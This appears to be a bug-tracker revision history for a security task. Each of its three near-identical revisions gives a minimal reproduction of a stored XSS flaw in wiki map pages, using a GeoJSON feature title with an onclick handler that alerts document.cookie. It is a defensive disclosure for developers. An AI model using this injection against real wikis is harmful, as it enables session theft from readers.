Change Details

Discovered while investigating {T155216}. Minimal repro: On shared wiki, create a page called `Data:XSS.map`: ```lang=javascript { "license": "CC0-1.0", "description": { "en": "blah" }, "sources": "blah", "zoom": 13, "latitude": -34.75315, "longitude": 149.71575, "data": { "type": "FeatureCollection", "features": [ { "type": "Feature", "properties": { "title": { "en": "<span onclick='javascript:alert(document.cookie)'>Click me</span>" } }, "geometry": { "type": "Point", "coordinates": [ 149.713056, -34.7475 ] } } ] } } ``` Then, either on the same or client wiki, create the following page: ``` <mapframe width=500 height=500> { "type": "ExternalData", "service": "page", "title": "Test.map" } </mapframe> ``` Upon saving and clicking on affected marker, XSS is triggered.

Discovered while investigating {T155216}. Minimal repro: On shared wiki, create a page called `Data:XSS.map`: ```lang=javascript { "license": "CC0-1.0", "description": { "en": "blah" }, "sources": "blah", "zoom": 13, "latitude": -34.75315, "longitude": 149.71575, "data": { "type": "FeatureCollection", "features": [ { "type": "Feature", "properties": { "title": { "en": "<span onclick='javascript:alert(document.cookie)'>Click me</span>" } }, "geometry": { "type": "Point", "coordinates": [ 149.713056, -34.7475 ] } } ] } } ``` Then, either on the same or client wiki, create the following page: ``` <mapframe width=500 height=500> { "type": "ExternalData", "service": "page", "title": "Test.map" } </mapframe> ``` Upon saving and clicking on affected marker then on "click me", XSS is triggered. Doesn't seem to work with crude `<script>` injection.

Discovered while investigating {T155216}. Minimal repro: On shared wiki, create a page called `Data:XSS.map`: ```lang=javascript { "license": "CC0-1.0", "description": { "en": "blah" }, "sources": "blah", "zoom": 13, "latitude": -34.75315, "longitude": 149.71575, "data": { "type": "FeatureCollection", "features": [ { "type": "Feature", "properties": { "title": { "en": "<span onclick='javascript:alert(document.cookie)'>Click me</span>" } }, "geometry": { "type": "Point", "coordinates": [ 149.713056, -34.7475 ] } } ] } } ``` Then, either on the same or client wiki, create the following page: ``` <mapframe width=500 height=500> { "type": "ExternalData", "service": "page", "title": "Test.map" } </mapframe> ``` Upon saving and clicking on affected marker, then on "click me", XSS is triggered. XSS is triggeredDoesn't seem to work with crude `<script>` injection.